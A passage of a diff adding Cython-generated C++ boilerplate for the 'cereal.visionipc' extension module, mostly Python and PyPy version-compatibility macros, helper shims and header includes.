#ifndef CYTHON_FALLTHROUGH + #if __has_attribute(fallthrough) + #define CYTHON_FALLTHROUGH __attribute__((fallthrough)) + #else + #define CYTHON_FALLTHROUGH + #endif + #endif + #if defined(__clang__) && defined(__apple_build_version__) + #if __apple_build_version__ < 7000000 + #undef CYTHON_FALLTHROUGH + #define CYTHON_FALLTHROUGH + #endif + #endif +#endif +#ifdef __cplusplus + template + struct __PYX_IS_UNSIGNED_IMPL {static const bool value = T(0) < T(-1);}; + #define __PYX_IS_UNSIGNED(type) (__PYX_IS_UNSIGNED_IMPL::value) +#else + #define __PYX_IS_UNSIGNED(type) (((type)-1) > 0) +#endif +#if CYTHON_COMPILING_IN_PYPY == 1 + #define __PYX_NEED_TP_PRINT_SLOT (PY_VERSION_HEX >= 0x030800b4 && PY_VERSION_HEX < 0x030A0000) +#else + #define __PYX_NEED_TP_PRINT_SLOT (PY_VERSION_HEX >= 0x030800b4 && PY_VERSION_HEX < 0x03090000) +#endif +#define __PYX_REINTERPRET_FUNCION(func_pointer, other_pointer) ((func_pointer)(void(*)(void))(other_pointer)) + +#ifndef __cplusplus + #error "Cython files generated with the C++ option must be compiled with a C++ compiler." +#endif +#ifndef CYTHON_INLINE + #if defined(__clang__) + #define CYTHON_INLINE __inline__ __attribute__ ((__unused__)) + #else + #define CYTHON_INLINE inline + #endif +#endif +template +void __Pyx_call_destructor(T& x) { + x.~T(); +} +template +class __Pyx_FakeReference { + public: + __Pyx_FakeReference() : ptr(NULL) { } + __Pyx_FakeReference(const T& ref) : ptr(const_cast(&ref)) { } + T *operator->() { return ptr; } + T *operator&() { return ptr; } + operator T&() { return *ptr; } + template bool operator ==(const U& other) const { return *ptr == other; } + template bool operator !=(const U& other) const { return *ptr != other; } + template bool operator==(const __Pyx_FakeReference& other) const { return *ptr == *other.ptr; } + template bool operator!=(const __Pyx_FakeReference& other) const { return *ptr != *other.ptr; } + private: + T *ptr; +}; + +#define __PYX_BUILD_PY_SSIZE_T "n" +#define CYTHON_FORMAT_SSIZE_T "z" +#if PY_MAJOR_VERSION < 3 + #define __Pyx_BUILTIN_MODULE_NAME "__builtin__" + #define __Pyx_DefaultClassType PyClass_Type + #define __Pyx_PyCode_New(a, p, k, l, s, f, code, c, n, v, fv, cell, fn, name, fline, lnos)\ + PyCode_New(a+k, l, s, f, code, c, n, v, fv, cell, fn, name, fline, lnos) +#else + #define __Pyx_BUILTIN_MODULE_NAME "builtins" + #define __Pyx_DefaultClassType PyType_Type +#if PY_VERSION_HEX >= 0x030B00A1 + static CYTHON_INLINE PyCodeObject* __Pyx_PyCode_New(int a, int p, int k, int l, int s, int f, + PyObject *code, PyObject *c, PyObject* n, PyObject *v, + PyObject *fv, PyObject *cell, PyObject* fn, + PyObject *name, int fline, PyObject *lnos) { + PyObject *kwds=NULL, *argcount=NULL, *posonlyargcount=NULL, *kwonlyargcount=NULL; + PyObject *nlocals=NULL, *stacksize=NULL, *flags=NULL, *replace=NULL, *empty=NULL; + const char *fn_cstr=NULL; + const char *name_cstr=NULL; + PyCodeObject *co=NULL, *result=NULL; + PyObject *type, *value, *traceback; + PyErr_Fetch(&type, &value, &traceback); + if (!(kwds=PyDict_New())) goto end; + if (!(argcount=PyLong_FromLong(a))) goto end; + if (PyDict_SetItemString(kwds, "co_argcount", argcount) != 0) goto end; + if (!(posonlyargcount=PyLong_FromLong(p))) goto end; + if (PyDict_SetItemString(kwds, "co_posonlyargcount", posonlyargcount) != 0) goto end; + if (!(kwonlyargcount=PyLong_FromLong(k))) goto end; + if (PyDict_SetItemString(kwds, "co_kwonlyargcount", kwonlyargcount) != 0) goto end; + if (!(nlocals=PyLong_FromLong(l))) goto end; + if (PyDict_SetItemString(kwds, "co_nlocals", nlocals) != 0) goto end; + if (!(stacksize=PyLong_FromLong(s))) goto end; + if (PyDict_SetItemString(kwds, "co_stacksize", stacksize) != 0) goto end; + if (!(flags=PyLong_FromLong(f))) goto end; + if (PyDict_SetItemString(kwds, "co_flags", flags) != 0) goto end; + if (PyDict_SetItemString(kwds, "co_code", code) != 0) goto end; + if (PyDict_SetItemString(kwds, "co_consts", c) != 0) goto end; + if (PyDict_SetItemString(kwds, "co_names", n) != 0) goto end; + if (PyDict_SetItemString(kwds, "co_varnames", v) != 0) goto end; + if (PyDict_SetItemString(kwds, "co_freevars", fv) != 0) goto end; + if (PyDict_SetItemString(kwds, "co_cellvars", cell) != 0) goto end; + if (PyDict_SetItemString(kwds, "co_linetable", lnos) != 0) goto end; + if (!(fn_cstr=PyUnicode_AsUTF8AndSize(fn, NULL))) goto end; + if (!(name_cstr=PyUnicode_AsUTF8AndSize(name, NULL))) goto end; + if (!(co = PyCode_NewEmpty(fn_cstr, name_cstr, fline))) goto end; + if (!(replace = PyObject_GetAttrString((PyObject*)co, "replace"))) goto end; + if (!(empty = PyTuple_New(0))) goto end; + result = (PyCodeObject*) PyObject_Call(replace, empty, kwds); + end: + Py_XDECREF((PyObject*) co); + Py_XDECREF(kwds); + Py_XDECREF(argcount); + Py_XDECREF(posonlyargcount); + Py_XDECREF(kwonlyargcount); + Py_XDECREF(nlocals); + Py_XDECREF(stacksize); + Py_XDECREF(replace); + Py_XDECREF(empty); + if (type) { + PyErr_Restore(type, value, traceback); + } + return result; + } +#elif PY_VERSION_HEX >= 0x030800B2 && !CYTHON_COMPILING_IN_PYPY + #define __Pyx_PyCode_New(a, p, k, l, s, f, code, c, n, v, fv, cell, fn, name, fline, lnos)\ + PyCode_NewWithPosOnlyArgs(a, p, k, l, s, f, code, c, n, v, fv, cell, fn, name, fline, lnos) +#else + #define __Pyx_PyCode_New(a, p, k, l, s, f, code, c, n, v, fv, cell, fn, name, fline, lnos)\ + PyCode_New(a, k, l, s, f, code, c, n, v, fv, cell, fn, name, fline, lnos) +#endif +#endif +#if PY_VERSION_HEX >= 0x030900A4 || defined(Py_IS_TYPE) + #define __Pyx_IS_TYPE(ob, type) Py_IS_TYPE(ob, type) +#else + #define __Pyx_IS_TYPE(ob, type) (((const PyObject*)ob)->ob_type == (type)) +#endif +#if PY_VERSION_HEX >= 0x030A00B1 || defined(Py_Is) + #define __Pyx_Py_Is(x, y) Py_Is(x, y) +#else + #define __Pyx_Py_Is(x, y) ((x) == (y)) +#endif +#if PY_VERSION_HEX >= 0x030A00B1 || defined(Py_IsNone) + #define __Pyx_Py_IsNone(ob) Py_IsNone(ob) +#else + #define __Pyx_Py_IsNone(ob) __Pyx_Py_Is((ob), Py_None) +#endif +#if PY_VERSION_HEX >= 0x030A00B1 || defined(Py_IsTrue) + #define __Pyx_Py_IsTrue(ob) Py_IsTrue(ob) +#else + #define __Pyx_Py_IsTrue(ob) __Pyx_Py_Is((ob), Py_True) +#endif +#if PY_VERSION_HEX >= 0x030A00B1 || defined(Py_IsFalse) + #define __Pyx_Py_IsFalse(ob) Py_IsFalse(ob) +#else + #define __Pyx_Py_IsFalse(ob) __Pyx_Py_Is((ob), Py_False) +#endif +#define __Pyx_NoneAsNull(obj) (__Pyx_Py_IsNone(obj) ? NULL : (obj)) +#if PY_VERSION_HEX >= 0x030900F0 && !CYTHON_COMPILING_IN_PYPY + #define __Pyx_PyObject_GC_IsFinalized(o) PyObject_GC_IsFinalized(o) +#else + #define __Pyx_PyObject_GC_IsFinalized(o) _PyGC_FINALIZED(o) +#endif +#ifndef CO_COROUTINE + #define CO_COROUTINE 0x80 +#endif +#ifndef CO_ASYNC_GENERATOR + #define CO_ASYNC_GENERATOR 0x200 +#endif +#ifndef Py_TPFLAGS_CHECKTYPES + #define Py_TPFLAGS_CHECKTYPES 0 +#endif +#ifndef Py_TPFLAGS_HAVE_INDEX + #define Py_TPFLAGS_HAVE_INDEX 0 +#endif +#ifndef Py_TPFLAGS_HAVE_NEWBUFFER + #define Py_TPFLAGS_HAVE_NEWBUFFER 0 +#endif +#ifndef Py_TPFLAGS_HAVE_FINALIZE + #define Py_TPFLAGS_HAVE_FINALIZE 0 +#endif +#ifndef Py_TPFLAGS_SEQUENCE + #define Py_TPFLAGS_SEQUENCE 0 +#endif +#ifndef Py_TPFLAGS_MAPPING + #define Py_TPFLAGS_MAPPING 0 +#endif +#ifndef METH_STACKLESS + #define METH_STACKLESS 0 +#endif +#if PY_VERSION_HEX <= 0x030700A3 || !defined(METH_FASTCALL) + #ifndef METH_FASTCALL + #define METH_FASTCALL 0x80 + #endif + typedef PyObject *(*__Pyx_PyCFunctionFast) (PyObject *self, PyObject *const *args, Py_ssize_t nargs); + typedef PyObject *(*__Pyx_PyCFunctionFastWithKeywords) (PyObject *self, PyObject *const *args, + Py_ssize_t nargs, PyObject *kwnames); +#else + #define __Pyx_PyCFunctionFast _PyCFunctionFast + #define __Pyx_PyCFunctionFastWithKeywords _PyCFunctionFastWithKeywords +#endif +#if CYTHON_METH_FASTCALL + #define __Pyx_METH_FASTCALL METH_FASTCALL + #define __Pyx_PyCFunction_FastCall __Pyx_PyCFunctionFast + #define __Pyx_PyCFunction_FastCallWithKeywords __Pyx_PyCFunctionFastWithKeywords +#else + #define __Pyx_METH_FASTCALL METH_VARARGS + #define __Pyx_PyCFunction_FastCall PyCFunction + #define __Pyx_PyCFunction_FastCallWithKeywords PyCFunctionWithKeywords +#endif +#if CYTHON_VECTORCALL + #define __pyx_vectorcallfunc vectorcallfunc + #define __Pyx_PY_VECTORCALL_ARGUMENTS_OFFSET PY_VECTORCALL_ARGUMENTS_OFFSET + #define __Pyx_PyVectorcall_NARGS(n) PyVectorcall_NARGS((size_t)(n)) +#elif CYTHON_BACKPORT_VECTORCALL + typedef PyObject *(*__pyx_vectorcallfunc)(PyObject *callable, PyObject *const *args, + size_t nargsf, PyObject *kwnames); + #define __Pyx_PY_VECTORCALL_ARGUMENTS_OFFSET ((size_t)1 << (8 * sizeof(size_t) - 1)) + #define __Pyx_PyVectorcall_NARGS(n) ((Py_ssize_t)(((size_t)(n)) & ~__Pyx_PY_VECTORCALL_ARGUMENTS_OFFSET)) +#else + #define __Pyx_PY_VECTORCALL_ARGUMENTS_OFFSET 0 + #define __Pyx_PyVectorcall_NARGS(n) ((Py_ssize_t)(n)) +#endif +#if PY_VERSION_HEX < 0x030900B1 + #define __Pyx_PyType_FromModuleAndSpec(m, s, b) ((void)m, PyType_FromSpecWithBases(s, b)) + typedef PyObject *(*__Pyx_PyCMethod)(PyObject *, PyTypeObject *, PyObject *const *, size_t, PyObject *); +#else + #define __Pyx_PyType_FromModuleAndSpec(m, s, b) PyType_FromModuleAndSpec(m, s, b) + #define __Pyx_PyCMethod PyCMethod +#endif +#ifndef METH_METHOD + #define METH_METHOD 0x200 +#endif +#if CYTHON_COMPILING_IN_PYPY && !defined(PyObject_Malloc) + #define PyObject_Malloc(s) PyMem_Malloc(s) + #define PyObject_Free(p) PyMem_Free(p) + #define PyObject_Realloc(p) PyMem_Realloc(p) +#endif +#if CYTHON_COMPILING_IN_LIMITED_API + #define __Pyx_PyCode_HasFreeVars(co) (PyCode_GetNumFree(co) > 0) + #define __Pyx_PyFrame_SetLineNumber(frame, lineno) +#else + #define __Pyx_PyCode_HasFreeVars(co) (PyCode_GetNumFree(co) > 0) + #define __Pyx_PyFrame_SetLineNumber(frame, lineno) (frame)->f_lineno = (lineno) +#endif +#if CYTHON_COMPILING_IN_LIMITED_API + #define __Pyx_PyThreadState_Current PyThreadState_Get() +#elif !CYTHON_FAST_THREAD_STATE + #define __Pyx_PyThreadState_Current PyThreadState_GET() +#elif PY_VERSION_HEX >= 0x03060000 + #define __Pyx_PyThreadState_Current _PyThreadState_UncheckedGet() +#elif PY_VERSION_HEX >= 0x03000000 + #define __Pyx_PyThreadState_Current PyThreadState_GET() +#else + #define __Pyx_PyThreadState_Current _PyThreadState_Current +#endif +#if CYTHON_COMPILING_IN_LIMITED_API +static CYTHON_INLINE void *__Pyx_PyModule_GetState(PyObject *op) +{ + void *result; + result = PyModule_GetState(op); + if (!result) + Py_FatalError("Couldn't find the module state"); + return result; +} +#endif +#define __Pyx_PyObject_GetSlot(obj, name, func_ctype) __Pyx_PyType_GetSlot(Py_TYPE(obj), name, func_ctype) +#if CYTHON_COMPILING_IN_LIMITED_API + #define __Pyx_PyType_GetSlot(type, name, func_ctype) ((func_ctype) PyType_GetSlot((type), Py_##name)) +#else + #define __Pyx_PyType_GetSlot(type, name, func_ctype) ((type)->name) +#endif +#if PY_VERSION_HEX < 0x030700A2 && !defined(PyThread_tss_create) && !defined(Py_tss_NEEDS_INIT) +#include "pythread.h" +#define Py_tss_NEEDS_INIT 0 +typedef int Py_tss_t; +static CYTHON_INLINE int PyThread_tss_create(Py_tss_t *key) { + *key = PyThread_create_key(); + return 0; +} +static CYTHON_INLINE Py_tss_t * PyThread_tss_alloc(void) { + Py_tss_t *key = (Py_tss_t *)PyObject_Malloc(sizeof(Py_tss_t)); + *key = Py_tss_NEEDS_INIT; + return key; +} +static CYTHON_INLINE void PyThread_tss_free(Py_tss_t *key) { + PyObject_Free(key); +} +static CYTHON_INLINE int PyThread_tss_is_created(Py_tss_t *key) { + return *key != Py_tss_NEEDS_INIT; +} +static CYTHON_INLINE void PyThread_tss_delete(Py_tss_t *key) { + PyThread_delete_key(*key); + *key = Py_tss_NEEDS_INIT; +} +static CYTHON_INLINE int PyThread_tss_set(Py_tss_t *key, void *value) { + return PyThread_set_key_value(*key, value); +} +static CYTHON_INLINE void * PyThread_tss_get(Py_tss_t *key) { + return PyThread_get_key_value(*key); +} +#endif +#if PY_MAJOR_VERSION < 3 + #if CYTHON_COMPILING_IN_PYPY + #if PYPY_VERSION_NUM < 0x07030600 + #if defined(__cplusplus) && __cplusplus >= 201402L + [[deprecated("`with nogil:` inside a nogil function will not release the GIL in PyPy2 < 7.3.6")]] + #elif defined(__GNUC__) || defined(__clang__) + __attribute__ ((__deprecated__("`with nogil:` inside a nogil function will not release the GIL in PyPy2 < 7.3.6"))) + #elif defined(_MSC_VER) + __declspec(deprecated("`with nogil:` inside a nogil function will not release the GIL in PyPy2 < 7.3.6")) + #endif + static CYTHON_INLINE int PyGILState_Check(void) { + return 0; + } + #else // PYPY_VERSION_NUM < 0x07030600 + #endif // PYPY_VERSION_NUM < 0x07030600 + #else + static CYTHON_INLINE int PyGILState_Check(void) { + PyThreadState * tstate = _PyThreadState_Current; + return tstate && (tstate == PyGILState_GetThisThreadState()); + } + #endif +#endif +#if CYTHON_COMPILING_IN_CPYTHON || defined(_PyDict_NewPresized) +#define __Pyx_PyDict_NewPresized(n) ((n <= 8) ? PyDict_New() : _PyDict_NewPresized(n)) +#else +#define __Pyx_PyDict_NewPresized(n) PyDict_New() +#endif +#if PY_MAJOR_VERSION >= 3 || CYTHON_FUTURE_DIVISION + #define __Pyx_PyNumber_Divide(x,y) PyNumber_TrueDivide(x,y) + #define __Pyx_PyNumber_InPlaceDivide(x,y) PyNumber_InPlaceTrueDivide(x,y) +#else + #define __Pyx_PyNumber_Divide(x,y) PyNumber_Divide(x,y) + #define __Pyx_PyNumber_InPlaceDivide(x,y) PyNumber_InPlaceDivide(x,y) +#endif +#if CYTHON_COMPILING_IN_CPYTHON && PY_VERSION_HEX > 0x030600B4 && CYTHON_USE_UNICODE_INTERNALS +#define __Pyx_PyDict_GetItemStrWithError(dict, name) _PyDict_GetItem_KnownHash(dict, name, ((PyASCIIObject *) name)->hash) +static CYTHON_INLINE PyObject * __Pyx_PyDict_GetItemStr(PyObject *dict, PyObject *name) { + PyObject *res = __Pyx_PyDict_GetItemStrWithError(dict, name); + if (res == NULL) PyErr_Clear(); + return res; +} +#elif PY_MAJOR_VERSION >= 3 && (!CYTHON_COMPILING_IN_PYPY || PYPY_VERSION_NUM >= 0x07020000) +#define __Pyx_PyDict_GetItemStrWithError PyDict_GetItemWithError +#define __Pyx_PyDict_GetItemStr PyDict_GetItem +#else +static CYTHON_INLINE PyObject * __Pyx_PyDict_GetItemStrWithError(PyObject *dict, PyObject *name) { +#if CYTHON_COMPILING_IN_PYPY + return PyDict_GetItem(dict, name); +#else + PyDictEntry *ep; + PyDictObject *mp = (PyDictObject*) dict; + long hash = ((PyStringObject *) name)->ob_shash; + assert(hash != -1); + ep = (mp->ma_lookup)(mp, name, hash); + if (ep == NULL) { + return NULL; + } + return ep->me_value; +#endif +} +#define __Pyx_PyDict_GetItemStr PyDict_GetItem +#endif +#if CYTHON_USE_TYPE_SLOTS + #define __Pyx_PyType_GetFlags(tp) (((PyTypeObject *)tp)->tp_flags) + #define __Pyx_PyType_HasFeature(type, feature) ((__Pyx_PyType_GetFlags(type) & (feature)) != 0) + #define __Pyx_PyObject_GetIterNextFunc(obj) (Py_TYPE(obj)->tp_iternext) +#else + #define __Pyx_PyType_GetFlags(tp) (PyType_GetFlags((PyTypeObject *)tp)) + #define __Pyx_PyType_HasFeature(type, feature) PyType_HasFeature(type, feature) + #define __Pyx_PyObject_GetIterNextFunc(obj) PyIter_Next +#endif +#if CYTHON_USE_TYPE_SPECS && PY_VERSION_HEX >= 0x03080000 +#define __Pyx_PyHeapTypeObject_GC_Del(obj) {\ + PyTypeObject *type = Py_TYPE(obj);\ + assert(__Pyx_PyType_HasFeature(type, Py_TPFLAGS_HEAPTYPE));\ + PyObject_GC_Del(obj);\ + Py_DECREF(type);\ +} +#else +#define __Pyx_PyHeapTypeObject_GC_Del(obj) PyObject_GC_Del(obj) +#endif +#if CYTHON_COMPILING_IN_LIMITED_API + #define CYTHON_PEP393_ENABLED 1 + #define __Pyx_PyUnicode_READY(op) (0) + #define __Pyx_PyUnicode_GET_LENGTH(u) PyUnicode_GetLength(u) + #define __Pyx_PyUnicode_READ_CHAR(u, i) PyUnicode_ReadChar(u, i) + #define __Pyx_PyUnicode_MAX_CHAR_VALUE(u) ((void)u, 1114111U) + #define __Pyx_PyUnicode_KIND(u) ((void)u, (0)) + #define __Pyx_PyUnicode_DATA(u) ((void*)u) + #define __Pyx_PyUnicode_READ(k, d, i) ((void)k, PyUnicode_ReadChar((PyObject*)(d), i)) + #define __Pyx_PyUnicode_IS_TRUE(u) (0 != PyUnicode_GetLength(u)) +#elif PY_VERSION_HEX > 0x03030000 && defined(PyUnicode_KIND) + #define CYTHON_PEP393_ENABLED 1 + #if PY_VERSION_HEX >= 0x030C0000 + #define __Pyx_PyUnicode_READY(op) (0) + #else + #define __Pyx_PyUnicode_READY(op) (likely(PyUnicode_IS_READY(op)) ?\ + 0 : _PyUnicode_Ready((PyObject *)(op))) + #endif + #define __Pyx_PyUnicode_GET_LENGTH(u) PyUnicode_GET_LENGTH(u) + #define __Pyx_PyUnicode_READ_CHAR(u, i) PyUnicode_READ_CHAR(u, i) + #define __Pyx_PyUnicode_MAX_CHAR_VALUE(u) PyUnicode_MAX_CHAR_VALUE(u) + #define __Pyx_PyUnicode_KIND(u) ((int)PyUnicode_KIND(u)) + #define __Pyx_PyUnicode_DATA(u) PyUnicode_DATA(u) + #define __Pyx_PyUnicode_READ(k, d, i) PyUnicode_READ(k, d, i) + #define __Pyx_PyUnicode_WRITE(k, d, i, ch) PyUnicode_WRITE(k, d, i, (Py_UCS4) ch) + #if PY_VERSION_HEX >= 0x030C0000 + #define __Pyx_PyUnicode_IS_TRUE(u) (0 != PyUnicode_GET_LENGTH(u)) + #else + #if CYTHON_COMPILING_IN_CPYTHON && PY_VERSION_HEX >= 0x03090000 + #define __Pyx_PyUnicode_IS_TRUE(u) (0 != (likely(PyUnicode_IS_READY(u)) ? PyUnicode_GET_LENGTH(u) : ((PyCompactUnicodeObject *)(u))->wstr_length)) + #else + #define __Pyx_PyUnicode_IS_TRUE(u) (0 != (likely(PyUnicode_IS_READY(u)) ? PyUnicode_GET_LENGTH(u) : PyUnicode_GET_SIZE(u))) + #endif + #endif +#else + #define CYTHON_PEP393_ENABLED 0 + #define PyUnicode_1BYTE_KIND 1 + #define PyUnicode_2BYTE_KIND 2 + #define PyUnicode_4BYTE_KIND 4 + #define __Pyx_PyUnicode_READY(op) (0) + #define __Pyx_PyUnicode_GET_LENGTH(u) PyUnicode_GET_SIZE(u) + #define __Pyx_PyUnicode_READ_CHAR(u, i) ((Py_UCS4)(PyUnicode_AS_UNICODE(u)[i])) + #define __Pyx_PyUnicode_MAX_CHAR_VALUE(u) ((sizeof(Py_UNICODE) == 2) ? 65535U : 1114111U) + #define __Pyx_PyUnicode_KIND(u) ((int)sizeof(Py_UNICODE)) + #define __Pyx_PyUnicode_DATA(u) ((void*)PyUnicode_AS_UNICODE(u)) + #define __Pyx_PyUnicode_READ(k, d, i) ((void)(k), (Py_UCS4)(((Py_UNICODE*)d)[i])) + #define __Pyx_PyUnicode_WRITE(k, d, i, ch) (((void)(k)), ((Py_UNICODE*)d)[i] = (Py_UNICODE) ch) + #define __Pyx_PyUnicode_IS_TRUE(u) (0 != PyUnicode_GET_SIZE(u)) +#endif +#if CYTHON_COMPILING_IN_PYPY + #define __Pyx_PyUnicode_Concat(a, b) PyNumber_Add(a, b) + #define __Pyx_PyUnicode_ConcatSafe(a, b) PyNumber_Add(a, b) +#else + #define __Pyx_PyUnicode_Concat(a, b) PyUnicode_Concat(a, b) + #define __Pyx_PyUnicode_ConcatSafe(a, b) ((unlikely((a) == Py_None) || unlikely((b) == Py_None)) ?\ + PyNumber_Add(a, b) : __Pyx_PyUnicode_Concat(a, b)) +#endif +#if CYTHON_COMPILING_IN_PYPY + #if !defined(PyUnicode_DecodeUnicodeEscape) + #define PyUnicode_DecodeUnicodeEscape(s, size, errors) PyUnicode_Decode(s, size, "unicode_escape", errors) + #endif + #if !defined(PyUnicode_Contains) || (PY_MAJOR_VERSION == 2 && PYPY_VERSION_NUM < 0x07030500) + #undef PyUnicode_Contains + #define PyUnicode_Contains(u, s) PySequence_Contains(u, s) + #endif + #if !defined(PyByteArray_Check) + #define PyByteArray_Check(obj) PyObject_TypeCheck(obj, &PyByteArray_Type) + #endif + #if !defined(PyObject_Format) + #define PyObject_Format(obj, fmt) PyObject_CallMethod(obj, "__format__", "O", fmt) + #endif +#endif +#define __Pyx_PyString_FormatSafe(a, b) ((unlikely((a) == Py_None || (PyString_Check(b) && !PyString_CheckExact(b)))) ? PyNumber_Remainder(a, b) : __Pyx_PyString_Format(a, b)) +#define __Pyx_PyUnicode_FormatSafe(a, b) ((unlikely((a) == Py_None || (PyUnicode_Check(b) && !PyUnicode_CheckExact(b)))) ? PyNumber_Remainder(a, b) : PyUnicode_Format(a, b)) +#if PY_MAJOR_VERSION >= 3 + #define __Pyx_PyString_Format(a, b) PyUnicode_Format(a, b) +#else + #define __Pyx_PyString_Format(a, b) PyString_Format(a, b) +#endif +#if PY_MAJOR_VERSION < 3 && !defined(PyObject_ASCII) + #define PyObject_ASCII(o) PyObject_Repr(o) +#endif +#if PY_MAJOR_VERSION >= 3 + #define PyBaseString_Type PyUnicode_Type + #define PyStringObject PyUnicodeObject + #define PyString_Type PyUnicode_Type + #define PyString_Check PyUnicode_Check + #define PyString_CheckExact PyUnicode_CheckExact +#ifndef PyObject_Unicode + #define PyObject_Unicode PyObject_Str +#endif +#endif +#if PY_MAJOR_VERSION >= 3 + #define __Pyx_PyBaseString_Check(obj) PyUnicode_Check(obj) + #define __Pyx_PyBaseString_CheckExact(obj) PyUnicode_CheckExact(obj) +#else + #define __Pyx_PyBaseString_Check(obj) (PyString_Check(obj) || PyUnicode_Check(obj)) + #define __Pyx_PyBaseString_CheckExact(obj) (PyString_CheckExact(obj) || PyUnicode_CheckExact(obj)) +#endif +#if CYTHON_COMPILING_IN_CPYTHON + #define __Pyx_PySequence_ListKeepNew(obj)\ + (likely(PyList_CheckExact(obj) && Py_REFCNT(obj) == 1) ? __Pyx_NewRef(obj) : PySequence_List(obj)) +#else + #define __Pyx_PySequence_ListKeepNew(obj) PySequence_List(obj) +#endif +#ifndef PySet_CheckExact + #define PySet_CheckExact(obj) __Pyx_IS_TYPE(obj, &PySet_Type) +#endif +#if PY_VERSION_HEX >= 0x030900A4 + #define __Pyx_SET_REFCNT(obj, refcnt) Py_SET_REFCNT(obj, refcnt) + #define __Pyx_SET_SIZE(obj, size) Py_SET_SIZE(obj, size) +#else + #define __Pyx_SET_REFCNT(obj, refcnt) Py_REFCNT(obj) = (refcnt) + #define __Pyx_SET_SIZE(obj, size) Py_SIZE(obj) = (size) +#endif +#if CYTHON_ASSUME_SAFE_MACROS + #define __Pyx_PySequence_SIZE(seq) Py_SIZE(seq) +#else + #define __Pyx_PySequence_SIZE(seq) PySequence_Size(seq) +#endif +#if PY_MAJOR_VERSION >= 3 + #define PyIntObject PyLongObject + #define PyInt_Type PyLong_Type + #define PyInt_Check(op) PyLong_Check(op) + #define PyInt_CheckExact(op) PyLong_CheckExact(op) + #define __Pyx_Py3Int_Check(op) PyLong_Check(op) + #define __Pyx_Py3Int_CheckExact(op) PyLong_CheckExact(op) + #define PyInt_FromString PyLong_FromString + #define PyInt_FromUnicode PyLong_FromUnicode + #define PyInt_FromLong PyLong_FromLong + #define PyInt_FromSize_t PyLong_FromSize_t + #define PyInt_FromSsize_t PyLong_FromSsize_t + #define PyInt_AsLong PyLong_AsLong + #define PyInt_AS_LONG PyLong_AS_LONG + #define PyInt_AsSsize_t PyLong_AsSsize_t + #define PyInt_AsUnsignedLongMask PyLong_AsUnsignedLongMask + #define PyInt_AsUnsignedLongLongMask PyLong_AsUnsignedLongLongMask + #define PyNumber_Int PyNumber_Long +#else + #define __Pyx_Py3Int_Check(op) (PyLong_Check(op) || PyInt_Check(op)) + #define __Pyx_Py3Int_CheckExact(op) (PyLong_CheckExact(op) || PyInt_CheckExact(op)) +#endif +#if PY_MAJOR_VERSION >= 3 + #define PyBoolObject PyLongObject +#endif +#if PY_MAJOR_VERSION >= 3 && CYTHON_COMPILING_IN_PYPY + #ifndef PyUnicode_InternFromString + #define PyUnicode_InternFromString(s) PyUnicode_FromString(s) + #endif +#endif +#if PY_VERSION_HEX < 0x030200A4 + typedef long Py_hash_t; + #define __Pyx_PyInt_FromHash_t PyInt_FromLong + #define __Pyx_PyInt_AsHash_t __Pyx_PyIndex_AsHash_t +#else + #define __Pyx_PyInt_FromHash_t PyInt_FromSsize_t + #define __Pyx_PyInt_AsHash_t __Pyx_PyIndex_AsSsize_t +#endif +#if CYTHON_USE_ASYNC_SLOTS + #if PY_VERSION_HEX >= 0x030500B1 + #define __Pyx_PyAsyncMethodsStruct PyAsyncMethods + #define __Pyx_PyType_AsAsync(obj) (Py_TYPE(obj)->tp_as_async) + #else + #define __Pyx_PyType_AsAsync(obj) ((__Pyx_PyAsyncMethodsStruct*) (Py_TYPE(obj)->tp_reserved)) + #endif +#else + #define __Pyx_PyType_AsAsync(obj) NULL +#endif +#ifndef __Pyx_PyAsyncMethodsStruct + typedef struct { + unaryfunc am_await; + unaryfunc am_aiter; + unaryfunc am_anext; + } __Pyx_PyAsyncMethodsStruct; +#endif + +#if defined(_WIN32) || defined(WIN32) || defined(MS_WINDOWS) + #if !defined(_USE_MATH_DEFINES) + #define _USE_MATH_DEFINES + #endif +#endif +#include +#ifdef NAN +#define __PYX_NAN() ((float) NAN) +#else +static CYTHON_INLINE float __PYX_NAN() { + float value; + memset(&value, 0xFF, sizeof(value)); + return value; +} +#endif +#if defined(__CYGWIN__) && defined(_LDBL_EQ_DBL) +#define __Pyx_truncl trunc +#else +#define __Pyx_truncl truncl +#endif + +#define __PYX_MARK_ERR_POS(f_index, lineno) \ + { __pyx_filename = __pyx_f[f_index]; (void)__pyx_filename; __pyx_lineno = lineno; (void)__pyx_lineno; __pyx_clineno = __LINE__; (void)__pyx_clineno; } +#define __PYX_ERR(f_index, lineno, Ln_error) \ + { __PYX_MARK_ERR_POS(f_index, lineno) goto Ln_error; } + +#ifdef CYTHON_EXTERN_C + #undef __PYX_EXTERN_C + #define __PYX_EXTERN_C CYTHON_EXTERN_C +#elif defined(__PYX_EXTERN_C) + #ifdef _MSC_VER + #pragma message ("Please do not define the '__PYX_EXTERN_C' macro externally. Use 'CYTHON_EXTERN_C' instead.") + #else + #warning Please do not define the '__PYX_EXTERN_C' macro externally. Use 'CYTHON_EXTERN_C' instead. + #endif +#else + #define __PYX_EXTERN_C extern "C++" +#endif + +#define __PYX_HAVE__cereal__visionipc__visionipc_pyx +#define __PYX_HAVE_API__cereal__visionipc__visionipc_pyx +/* Early includes */ +#include +#include +#include "ios" +#include "new" +#include "stdexcept" +#include "typeinfo" +#include +#include + + #if __cplusplus >= 201103L || (defined(_MSC_VER) && _MSC_VER >= 1600) + // move should be defined for these versions of MSVC, but __cplusplus isn't set usefully + #include + + namespace cython_std { + template typename std::remove_reference::type&& move(T& t) noexcept { return std::move(t); } + template typename std::remove_reference::type&& move(T&& t) noexcept { return std::move(t); } + } + + #endif + +#include +#include +#include "cereal/visionipc/visionbuf.h" +#include "cereal/visionipc/visionipc.h" +#include "cereal/visionipc/visionipc_server.h" +#include "cereal/visionipc/visionipc_client.h" +#include + + /* Using NumPy API declarations from "numpy/__init__.cython-30.pxd" */ + +#include "numpy/arrayobject.h" +#include "numpy/ndarrayobject.h" +#include "numpy/ndarraytypes.h" +#include "numpy/arrayscalars.h" +#include "numpy/ufuncobject.h" +#include "pythread.h" +#include +#ifdef _OPENMP +#include +#endif /* _OPENMP */ + +#if defined(PYREX_WITHOUT_ASSERTIONS) && !defined(CYTHON_WITHOUT_ASSERTIONS) +#define CYTHON_WITHOUT_ASSERTIONS +#endif + +typedef struct {PyObject **p; const char *s; const Py_ssize_t n; const char* encoding; + const char is_unicode; const char is_str; const char intern; } __Pyx_StringTabEntry; + +#define __PYX_DEFAULT_STRING_ENCODING_IS_ASCII 1 +#define __PYX_DEFAULT_STRING_ENCODING_IS_UTF8 0 +#define __PYX_DEFAULT_STRING_ENCODING_IS_DEFAULT (PY_MAJOR_VERSION >= 3 && 